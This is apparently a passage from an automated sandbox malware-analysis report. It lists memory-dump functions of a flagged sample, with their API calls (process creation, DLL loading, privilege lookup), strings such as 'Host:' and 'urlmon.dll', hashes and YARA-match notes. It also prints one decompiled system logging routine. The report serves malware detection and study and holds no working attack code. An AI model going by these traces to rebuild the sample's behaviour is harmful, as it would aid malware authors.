                                        Function 035496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 2c73da5c95da220a09fcc4ed8dce023de65f42aa21d1f1eb93510e9a9ee6ef6a
                                        • Instruction ID: 9ab0963f74ba4a1221feaa45edcf60b2afe66af05ec687bf2ad5df13251ccdea
                                        • Opcode Fuzzy Hash: 2c73da5c95da220a09fcc4ed8dce023de65f42aa21d1f1eb93510e9a9ee6ef6a
                                        • Instruction Fuzzy Hash: 039002723410CC03D111A159941474A0095E7D0341F55C412B8414659D87D598D17161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1dad53aeec0ebb4804b6f929b8758ec46c5447f057e0fc73b19e1b1248e5d97c
                                        • Instruction ID: 36272df661f6b68ea4f4c94c310f566680d69227c12b1b3a3c1ea0ac8a63f5c3
                                        • Opcode Fuzzy Hash: 1dad53aeec0ebb4804b6f929b8758ec46c5447f057e0fc73b19e1b1248e5d97c
                                        • Instruction Fuzzy Hash: 07900266351044030106E559171450700D6E7D5391351C022F5005551CD76198A16161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 305b151e6c5da16738b0e84325998f1a9984127e3e02a6cf67d10ad049fb07d1
                                        • Instruction ID: 053b9df15882ea01f54b8c66397c6750b32d72ea0626b9a5ad78ed09398bb25a
                                        • Opcode Fuzzy Hash: 305b151e6c5da16738b0e84325998f1a9984127e3e02a6cf67d10ad049fb07d1
                                        • Instruction Fuzzy Hash: 0A9002A2342044034106B1595424616409AE7E0241B51C022F5004591DC66598D17165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C6A050, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00C53AF8), ref: 00C6A07D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: db8b4752ffd3d8aa75f3078592f2a038eb9ee9556595e7f4cd84abe692352562
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: 96E04FB12002046FD714DF59CC45EA777ACEF88750F114554FD0857241C630F910CAF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C582E8, Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00C5834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00C5836B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: fd66a14df460c65729d2cd33b09c15ea6d3139e2fd0e5d46770c8fa0a1c4ccbc
                                        • Instruction ID: e87276a82bc30d4e5f2fc2d80854913424c055feae0d09e2bc45576e1e65afba
                                        • Opcode Fuzzy Hash: fd66a14df460c65729d2cd33b09c15ea6d3139e2fd0e5d46770c8fa0a1c4ccbc
                                        • Instruction Fuzzy Hash: F001D831A802287BEB20A6959C43FFF7B1CAB05B51F144115FF04FA1C1EA956A0E57E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C582F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00C5834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00C5836B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 20dece555e4a1120ccfd709e0daf035576eb9fbbb3830230e9c2e6b6934cd198
                                        • Instruction ID: b7848fdcb3b61f7038fb39165624bc156929efeda5695ad180e904d2adbe90f4
                                        • Opcode Fuzzy Hash: 20dece555e4a1120ccfd709e0daf035576eb9fbbb3830230e9c2e6b6934cd198
                                        • Instruction Fuzzy Hash: 3D01A231A802287BE720A6959C43FFF776CAB40F51F044119FF04BA1C1EA956A0A57FA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C5ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00C5AD42
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 85ae574ca24af7a59b171dfb5d736630c1d6d694e440d6baed6be77a191b44e4
                                        • Instruction ID: f5d0efcfc44c8f6746141f5cb2cc074adbadc4ef2a6047ad8c5f32d725f07bf5
                                        • Opcode Fuzzy Hash: 85ae574ca24af7a59b171dfb5d736630c1d6d694e440d6baed6be77a191b44e4
                                        • Instruction Fuzzy Hash: 7C011EB9D4020DABDB10EBE5DC82FEDB3B89B54309F004295ED1897241F671EB58DB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C6A0C0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00C6A114
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: 9c1aabf523e2efd4864eb649077a111f5bac382588182689a6a8cc4b9a5f4cd3
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: 1901B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C6A010, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00C64506,?,00C64C7F,00C64C7F,?,00C64506,?,?,?,?,?,00000000,00000000,?), ref: 00C6A03D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: cecfe39771b263ff5cb139df25b318b0a26e3aecee6bda64b131b68a7713c092
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 30E01AB1200204ABD714DF59CC41EA777ACEF88750F114558BA085B241C530F9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C6A1AE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00C5F1A2,00C5F1A2,?,00000000,?,?), ref: 00C6A1E0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c61c7b6b0e6378912dc256f6703cf9a2b7e968131de32759487674fc0019711a
                                        • Instruction ID: 25c1955365022c65468f99e711d5642224887a25a6512610c32547dfdba5457a
                                        • Opcode Fuzzy Hash: c61c7b6b0e6378912dc256f6703cf9a2b7e968131de32759487674fc0019711a
                                        • Instruction Fuzzy Hash: DFE04FB16002046FDB20DF55CC84EEB3769EF84360F118555F94C6B241C634E910CBB5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C6A1B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00C5F1A2,00C5F1A2,?,00000000,?,?), ref: 00C6A1E0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: 7dff6347c34596d375f8469140d8275b31e8ae3118a01f864a86e3c4a19acf66
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: 35E01AB12002086BDB20DF49CC85EE737ADEF88750F118154BA0867241C934E8108BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C5F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,00C58CF4,?), ref: 00C5F6CB
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 554306b3aa01e10ad0c7a997f061edf6c1e11df0f2a4c67a6644c38bdfc66c35
                                        • Instruction ID: 2585cff1a7a5ba48ab489eea657e770e0951a7fb13f04b78c3ceb45ae464f23e
                                        • Opcode Fuzzy Hash: 554306b3aa01e10ad0c7a997f061edf6c1e11df0f2a4c67a6644c38bdfc66c35
                                        • Instruction Fuzzy Hash: 75D0A7757903043BE614FAA49C13F2772CD6B55B01F490074FA48D73C3DD50E5014165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0354967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c72170e3afb9a5faa0c203e40f8bb410bcf30ad4d9511f03ef2f6e918c140bbd
                                        • Instruction ID: 24249ed461919522bc560a5d75172ebb0097cf1812ae32a2898adf11914620ba
                                        • Opcode Fuzzy Hash: c72170e3afb9a5faa0c203e40f8bb410bcf30ad4d9511f03ef2f6e918c140bbd
                                        • Instruction Fuzzy Hash: 2CB09B729424C5C6D615D76056087177954B7D0745F16C056E1020642A4778D0D1F5F5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00C66BC7, Relevance: 8.9, Strings: 7, Instructions: 104COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $: $: $Host$Host: $Unknown$w
                                        • API String ID: 0-3900047987
                                        • Opcode ID: 0d150c7fc0c2e7b0e45c7212367f192a06ebc7b1d53713001dc273c171a64dc4
                                        • Instruction ID: db75cf711d93f805f9d7be3a69141a428eaa5abc6dc1d070e132282b9527d48f
                                        • Opcode Fuzzy Hash: 0d150c7fc0c2e7b0e45c7212367f192a06ebc7b1d53713001dc273c171a64dc4
                                        • Instruction Fuzzy Hash: F63126B6904648AECB21CF94C8C1BEEB768EF85304F0485A9ED599B246C771AA44C7E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C672B0, Relevance: 3.8, Strings: 3, Instructions: 61COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: : $gent$urlmon.dll
                                        • API String ID: 0-558115763
                                        • Opcode ID: 184e301e9e073d9c2a33c046907f9ea23a23edf369e50c43d55ef3ecf85301c5
                                        • Instruction ID: bd6f05e487aba9d717cab14d60e5b38eaed7699246571a603a1556c5d996685b
                                        • Opcode Fuzzy Hash: 184e301e9e073d9c2a33c046907f9ea23a23edf369e50c43d55ef3ecf85301c5
                                        • Instruction Fuzzy Hash: 53019CB2F0111967D7305A51EC41FFFB728DB82B58F000254FD08B7340E625AE0217D6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0359FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E0359FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0354CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03595720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03595720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                        0x0359fdda
                                        0x0359fde2
                                        0x0359fde5
                                        0x0359fdec
                                        0x0359fdfa
                                        0x0359fdff
                                        0x0359fe0a
                                        0x0359fe0f
                                        0x0359fe17
                                        0x0359fe1e
                                        0x0359fe19
                                        0x0359fe19
                                        0x0359fe19
                                        0x0359fe20
                                        0x0359fe21
                                        0x0359fe22
                                        0x0359fe25
                                        0x0359fe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0359FDFA
                                        Strings
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0359FE2B
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0359FE01
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 8c9a5fc775d7c48b9f462bdca0b27a7c2d4babbcbb4f36ea006f0a4cc1dffdba
                                        • Instruction ID: a33f3a7949e7394077a5fc8d27b0a118ceac602859a40bc1987dfb0b835a32f7
                                        • Opcode Fuzzy Hash: 8c9a5fc775d7c48b9f462bdca0b27a7c2d4babbcbb4f36ea006f0a4cc1dffdba
                                        • Instruction Fuzzy Hash: 57F0FC362402017FEA259A45EC05F27BB6AFB85770F240716F624591E1EA62F93087F4
                                        Uniqueness

                                        Uniqueness Score: -1.00%